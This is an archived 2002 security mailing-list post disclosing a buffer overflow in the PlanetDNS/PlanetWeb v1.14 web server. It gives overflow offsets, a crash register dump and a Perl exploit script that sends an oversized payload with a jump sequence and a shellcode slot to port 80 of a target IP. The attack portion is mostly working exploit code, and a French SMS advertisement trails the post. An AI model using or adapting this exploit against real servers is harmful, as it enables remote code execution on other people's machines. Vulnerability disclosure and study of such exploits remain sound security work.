New buffer overflow in PlanetDNS

From: securma massine (securmaat_private)
Date: Fri Oct 18 2002 - 10:03:39 PDT

  • Next message: Samuel Tardieu: "Microsoft Windows Media Player for Sparc/Solaris vulnerability"

    planetdns ( 
    commercial software package that allows to
    turn computer into an Internet server. 
    and be able to create an Internet Name, connect to 
    a web server, FTP, mail server, etc. running
    on computer.
    planetdns is vulnerable has a buffer overflow with a 
    overwrite of eip (never posted before )... one already 
    notified that a number of 1024 byte could crasher the 
    server, and I found that while sending (without GET/)un of 
    6500 byte could thus make a overwrite eip of execution of a 
    shellcode, the overwrite is done with byte 6449, 50, 51, 
    one notices of aillor that ebx and always 4byte before the 
    eip the ret address will be thus a jmp ebx or call ebx that 
    one finds in many modules charged .
    I realised an exploit tested on plaetweb v1.14 and who 
    gives L state of the following registers:
    Access violation - code c0000005 (first chance)
    eax=0217dfb0 ebx=0217ffdc ecx=43434343 edx=7846f5b5 
    esi=0217dfd8 edi=00000000
    eip=43434343 esp=0217df18 ebp=0217df38 iopl=0 nv up 
    ei pl zr na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b 
    gs=0000 efl=00000246
    43434343 ?? ???
    exploit code:
    #!/usr/bin/perl -w
    # buffer overflow tested against plaetweb v1.14
    # humm..this exploit is not for lamers...
    # Greetz: marocit and (specialemet tu pédales moins fort, moins tu #avances 
    plus vite..)
    use IO::Socket;
    if ($#ARGV<0)
     print "\n write the target IP!! \n\n";
    $shellcode = 
    d your favorit shellcode
    $buffer = "A"x6444;
    $ebx = "\x90\xEB\x08\x90";# you have the chance because ebx 
    = eip - 4 bytes jmp short 0xff x0d3
    $ret = "\x43\x43\x43\x43";# insert your ret address with 
    (jmp ebx or call ebx)
    $minibuf ="\x90\x90\x90\x90";# will be jumped by EB08
    $connect = IO::Socket::INET ->new (Proto=>"tcp", 
    PeerAddr=> "$ARGV[0]",
    PeerPort=>"80"); unless ($connect) { die "cant connect $ARGV
    [0]" }
    print $connect "$buffer$ebx$ret$minibuf$shellcode";
    print "\nsending exploit......\n\n"; 
    Gagnes une PS2 ! Envoies un SMS avec le code PS au 61166
    (0,34€ Hors coût du SMS)

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